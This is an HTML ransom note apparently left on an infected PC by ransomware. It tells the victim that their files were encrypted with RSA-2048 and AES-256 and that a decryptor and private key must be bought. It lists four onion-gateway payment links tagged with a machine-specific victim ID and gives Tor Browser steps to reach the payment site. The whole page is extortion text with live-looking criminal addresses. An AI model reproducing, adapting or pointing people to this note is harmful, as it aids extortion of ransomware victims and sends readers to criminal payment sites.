<html>
    <head>
        <title>How can I recover my files ?</title>
        <style>
			html, body {
				font-family: lucida sans,tahoma,aerial,serif;
				font-size: 14px;
				overflow-x: hidden;
				background-color: #fff;
				padding-left: 1rem;
			}
			div.box {
				border: 1px dotted #212121;
				padding: 0.4rem;
				display: block;
				margin-top: 0.5rem;
				margin-bottom: 0.5rem;
			}
			input[type=submit] {
				border: none;
				padding: 0.1rem 0.7rem 0.1rem 0.7rem;
				background-color: #303f9f;
				color: #fff;
			}
			input[type=submit]:hover {
				background-color: #212121;
			}
			a {
				color: #212121;
				text-decoration: none;
				font-weight: bold;
			}
			a:hover {
				color: #3f51b5;
				text-decoration: underline;
			}
        </style>
    </head>
    <body>
		<div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;">
			<h3>What happened to my files ?</h3>
			<p>
				All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>.
			</p>

			<h3>What does this mean ?</h3>
			<p>
				This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them.
			</p>

			<h3>Is it possible to recover my files ?</h3>
			<p>
				Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them.
			</p>

			<h3>How can I get the decryptor and the private key ?</h3>
			<p>
				You can buy both of them in any of the links below. Just visit one of them and follow the instructions.
			</p>

			<div class="box">
				<ol>
					<li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/RADÍMEK-PC_B387BF53209777536522DF69/">http://lockerrwhuaf2jjx.onion.link/RADÍMEK-PC_B387BF53209777536522DF69/</a></li>
					<li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.gq/RADÍMEK-PC_B387BF53209777536522DF69/">https://lockerrwhuaf2jjx.onion.gq/RADÍMEK-PC_B387BF53209777536522DF69/</a></li>
					<li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/RADÍMEK-PC_B387BF53209777536522DF69/">https://lockerrwhuaf2jjx.onion.to/RADÍMEK-PC_B387BF53209777536522DF69/</a></li>
					<li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.top/RADÍMEK-PC_B387BF53209777536522DF69/">https://lockerrwhuaf2jjx.onion.top/RADÍMEK-PC_B387BF53209777536522DF69/</a></li>
				</ol>
			</div>

			<div class="box">
				<p>
					If you cannot access the site from any of the addresses above, you can follow the instructions below to access the site using the Tor Browser.
				</p>
				<hr>
				<ol>
					<li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li>
					<li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li>
					<li>Then simply open the folder and click on "Start Tor Browser".</li>
					<li>Copy and paste the onion address into the address bar: <span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/RADÍMEK-PC_B387BF53209777536522DF69/</span></li>
				</ol>
			</div>
		</div>
    </body>
</html>
